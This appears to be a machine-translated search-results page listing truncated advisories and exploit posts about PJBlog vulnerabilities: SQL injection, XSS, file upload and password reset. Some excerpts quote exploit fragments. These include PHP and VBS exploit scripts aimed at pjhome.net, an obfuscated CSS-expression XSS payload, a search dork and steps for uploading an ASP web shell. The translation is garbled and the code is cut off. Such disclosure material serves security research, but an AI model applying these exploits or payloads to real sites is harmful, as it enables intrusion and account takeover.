18 matches found
PJBlog 3.2.9.518 getwebshell exploit-vulnerability warning-the black bar safety net
Author: do not go to the bell Version: PJblog 3.2.9.518 (2012/5/9, the latest version at that time) Exploit conditions: 1. Full static mode is in use (the default is fully static mode). 2. The user can post (by default regular users cannot post, so this is of limited use). Vulnerability description: PJblog...
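PJBlog v3.0.6.170 Action.asp file XSS cross-site scripting vulnerability
PJBlog is a free, open-source Chinese personal blog system built on ASP+Access; it has fairly high operating performance and update rate, and also supports the new technologies currently used by blogs. In the file Action.asp: elseif request"action"="type1" then // line 23 dim mainurl,main,mainstr mainurl=request"mainurl" main=trimcheckstrrequest"main" response.clear mainstr="" If LenmemName0 Then mainstr=mainstr&"img...
PJBLOG Action.asp file: change any user's password
PJBlog is a free, open-source Chinese personal blog system built on ASP+Access; it has fairly high operating performance and update rate, and also supports the new technologies currently used by blogs. In the file Action.asp: ElseIf Request.QueryString"action" = "updatepassto" Then // line 307 If ChkPost Then Dim ePass, eRePass, eID, eRs, ehash, dpass eID = CheckStrUnEscapeRequest.QueryString"id" ePass =...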
PJBlog 3.0.6.170 Arbitrary File Upload
Discovered By: Securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir Application Info: Name: PJBlog Version: v3.0.6.170 Dork: intext:"PJBlog3 v3.0.6.170" errorreporting0; settimelimit0; iniset"defaultsockettimeout", 5; defineSTDIN, fopen"php://stdin", "r"; function httpsend$host,...
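SQL injection vulnerabilities in multiple files of the PJBlog blog program
A code audit found SQL injection vulnerabilities in blogcomm.asp, class/clswap.asp and member.asp. In the file member.asp: 1. UID=trimCheckStrrequest.form"UID" // line 191 2. …………………… 3. set checkUser=conn.execute"select top 1 from blogMember where memid="&UID" and memName='"&CheckStrmemName"'" 4. if checkUser.eof then 5. ReInfo0="错误信息" 6...
SQL injection flaw in the PJBlog blog system admin page Action.asp caused by insufficient filtering of the DelUserID variable
In the file control/ Action.aspp: 1. ElseIf Request.Form"whatdo" = "DelUser" Then // line 510 2. Dim DelUserID, DelUserName, blogmemberNum, DelUserStatus 3. DelUserID = Request.Form"DelID" 4. blogmemberNum = conn.Execute"select countmemID from blogMember where memStatus='SupAdmin'"0 5. 6. DelUserStatus =...
Injection vulnerability in the cls_logAction.asp file of the PJBlog personal blog system
PJBlog is a free, open-source Chinese personal blog system built on ASP+Access; it has fairly high operating performance and update rate, and also supports the new technologies currently used by blogs. In the file class/clslogAction.asp: oldcate=request.form"oldcate" // line 429 oldctype=request.form"oldtype" D = conn.execute"select catePart from blogCategory where cateID="&oldcate0 The program places the variable oldcate into the SQL query without any filtering, which results in an injection vulnerability. PJBlog...
SQL injection vulnerability in the PJBlog blog system admin page c_members.asp caused by insufficient filtering of the User variable
In the file control/ cmembers.asp: 1. FindUser = Request.QueryString"User" // line 28 2. If LenFindUser1 Then 3. FindUserFilter = "" 4. Else 5. FindUserFilter = " AND M.memName='" & FindUser & "'" 6. End If 7. …… 8. SQL = "SELECT M.,S.statname,S.stattitle FROM blogMember as M,blogstatus as S where...
SQL injection vulnerability in the PJBlog blog system page blogpost.asp caused by insufficient filtering of the log_CateID variable
In the file blogpost.asp: div id="MsgHead"在【<%=Conn.ExeCute"SELECT cateName FROM blogCategory WHERE cateID="&Request.Form"logCateID"&""0%】发表日志/div // line 162 The program places the variable logCateID into the SQL statement without filtering, which results in SQL injection. 3.0 Beta PJblog ------- The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page: http://bbs.pjhome.net/thread-48122-1-1.html PO...
SQL injection flaw in the PJBlog blog system admin page Action.asp
PJBlog is a free, open-source Chinese personal blog system built on ASP+Access; PJBlog supports both Simplified and Traditional Chinese and UTF-8 encoding; compared with other systems, PJBlog has fairly high operating performance and update rate, and also supports the new technologies currently used by blogs. In the file control/ Action.aspp: the variables moduleID,GetPlugName,KeyWordID,smilesID,LinkID,memID,doCommID,selCommID,TagsID,DelCate are placed into SQL statements without filtering, which results in injection vulnerabilities. 3.0 Beta PJblog -------...
Cross-site scripting vulnerability in the Action.asp page of the PJBlog personal blog system
In the file Action.asp: elseif request"action"="type1" then // line 23 dim mainurl,main,mainstr mainurl=request"mainurl" main=trimcheckstrrequest"main" response.clear mainstr="" If LenmemName0 Then mainstr=mainstr&"img src=""images/download.gif"" alt=""下载文件"" style=""margin:0px 2px -4px 0px""/ a...
Cross-site scripting vulnerability in the Getarticle.asp page of the PJBlog personal blog system
PJBlog is a free, open-source Chinese personal blog system built on ASP+Access; it has fairly high operating performance and update rate, and also supports the new technologies currently used by blogs. In the file Getarticle.asp: blogpostFile = request"blogpostFile" // line 14 ...... If Ifmore or thispage1 then // line 100 OutPut=OutPut&"br/strong模式:/strong a style='cursor:pointer'...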
PJblog V3.0 0day Vbs
No description provided by source. If WScript.Arguments.Count 2 Then WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名" WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam" WScript.Quit End If attackUrl = WScript.Arguments0 attackUser = WScript.Arguments1 attackUrl =...
PJblog V3.0 0day-vulnerability warning-the black bar safety net
Original link: ? php / PJblog V3. 0 0day exp code by small Roach&bink www.0kee.com www.t00ls.net 09.04.22 / $url="http://www.pjhome.net"; //inject the address $varname="puterjam"; //administrator $varkey="checkright"; if $SESSION"LenI" $LenI=$SESSION"LenI"; else $LenI=1; for$i=$LenI;$i=4 0;$i++...
PJblog V3.0 0day Vbs version of the exploit tool-vulnerability warning-the black bar safety net
Vulnerability details please see. On my computer there is no PHP installed, so I just wrote a Vbs version of the exploit tool; the specific code is as follows: 1. If WScript. Arguments. Count 2 Then 2. WScript. Echo “Usage: Cscript.exe Exp. vbs to detect the forum URL you want to detect the user name” 3...
PJblog the latest cross-site code-vulnerability warning-the black bar safety net
Just find a PJBLOG and then register a user.. After landing into the guestbook Input message remember in the secret where that box to be on the hook.. The message code can be like this: font=expressioncontainer. document. writeunescape'%6 8%7 4%7 4%7 0%3A%2F%2F%7 7% 7 7% 7 7%2%7 7% 6 9%6E%7 3% 6 ...
pjblog upload vulnerability-vulnerability warning-the black bar safety net
First of all have pjblog the super administrator accounteven is to take their blog to the test Log in, post a new log, pass an asp horse, and the extension to get rid of that pjblog seemingly didn't do the file header check, remember address Then login the backend, the recovery database before...
PJBLOG photo album plug-in there is a serious vulnerability-a vulnerability warning-the black bar safety net
Continue the Halo one! The want to get hold of a PJ album plug-in to play, did not expect to pass up, vulnerability is I found. The following I listed in the vulnerability details. -------------------------------------------------- Software name: PJBLOG album plug-in V2. 0 Wizard full version...